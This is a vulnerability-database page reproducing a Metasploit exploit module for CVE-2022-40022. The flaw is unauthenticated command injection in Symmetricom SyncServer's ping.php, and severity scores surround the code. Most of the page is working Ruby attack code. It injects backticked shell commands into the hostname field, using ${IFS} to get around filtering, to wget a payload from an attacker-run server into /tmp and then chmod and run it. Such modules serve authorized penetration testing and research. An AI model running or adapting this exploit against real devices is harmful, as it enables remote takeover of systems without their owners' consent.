Lucene search

K
metasploitSteve Campbell, Justin Fatuch Apt4hax, Robert BronsteinMSF:EXPLOIT-LINUX-HTTP-SYMMETRICOM_SYNCSERVER_RCE-
HistoryJun 08, 2023 - 4:46 p.m.

Symmetricom SyncServer Unauthenticated Remote Command Execution

2023-06-0816:46:10
Steve Campbell, Justin Fatuch Apt4hax, Robert Bronstein
www.rapid7.com
77

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.816 High

EPSS

Percentile

98.3%

This module exploits an unauthenticated command injection vulnerability in /controller/ping.php. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability. Later models require authentication which is not provided in this module because we can’t test it. The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022). Run ‘check’ first to determine if vulnerable. The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT and LPORT while testing this module.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.
          The S100 through S350 (End of Life) models should be vulnerable to
          unauthenticated exploitation due to a session handling vulnerability.
          Later models require authentication which is not provided in this module because we can't test it.
          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
          Run 'check' first to determine if vulnerable.
          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT
          and LPORT while testing this module.
        },
        'Author' => [
          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module
          'Justin Fatuch Apt4hax', # Exploit PoC
          'Robert Bronstein' # Metasploit Module
        ],
        'References' => [
          ['CVE', '2022-40022'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']
        ],
        'DisclosureDate' => '2022-08-31',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )
    register_options(
      [
        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),
        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),
        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])
      ], self.class
    )
  end

  def primer; end

  def on_request_uri(cli, req)
    @pl = generate_payload_exe
    print_status("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
  end

  def check
    uri = '/controller/ping.php'
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' =>
          {
            'currentTab' => 'ping',
            'refreshMode' => 'dirty',
            'ethDirty' => 'false',
            'snmpCfgDirty' => 'false',
            'snmpTrapDirty' => 'false',
            'pingDirty' => 'true',
            'hostname' => "\`id\`",
            'port' => 'eth0',
            'pingType' => 'ping'
          }
    })
    if res && res.body.to_s =~ /uid=0/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def request(cmd)
    uri = '/controller/ping.php'
    send_request_cgi({
      'method' => 'POST',
      'Content-Type' => 'application/x-www-form-encoded',
      'uri' => uri,
      'vars_post' =>
      {
        'currentTab' => 'ping',
        'refreshMode' => 'dirty',
        'ethDirty' => 'false',
        'snmpCfgDirty' => 'false',
        'snmpTrapDirty' => 'false',
        'pingDirty' => 'true',
        'hostname' => cmd,
        'port' => 'eth0',
        'pingType' => 'ping'
      }
    })
  end

  def exploit
    srvhost = datastore['SRVHOST']
    srvport = datastore['SRVPORT']
    filename = datastore['FILENAME']
    resource_uri = '/' + filename
    shell_path = '/tmp/'
    cmds = [
      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",
      "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",
      "\`" + shell_path + filename + "\`"
    ]
    start_service({
      'Uri' => {
        'Proc' => proc { |cli, req|
                    on_request_uri(cli, req)
                  },
        'Path' => resource_uri
      }
    })
    print_status("#{rhost}:#{rport} - Exploit started...")
    print_status("#{rhost}:#{rport} - Sending wget command...")
    request(cmds[0])
    sleep(3)
    print_status("#{rhost}:#{rport} - Making payload executable...")
    request(cmds[1])
    sleep(3)
    print_status("#{rhost}:#{rport} - Executing payload...")
    request(cmds[2])
    sleep(3)
  end
end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.816 High

EPSS

Percentile

98.3%

Related for MSF:EXPLOIT-LINUX-HTTP-SYMMETRICOM_SYNCSERVER_RCE-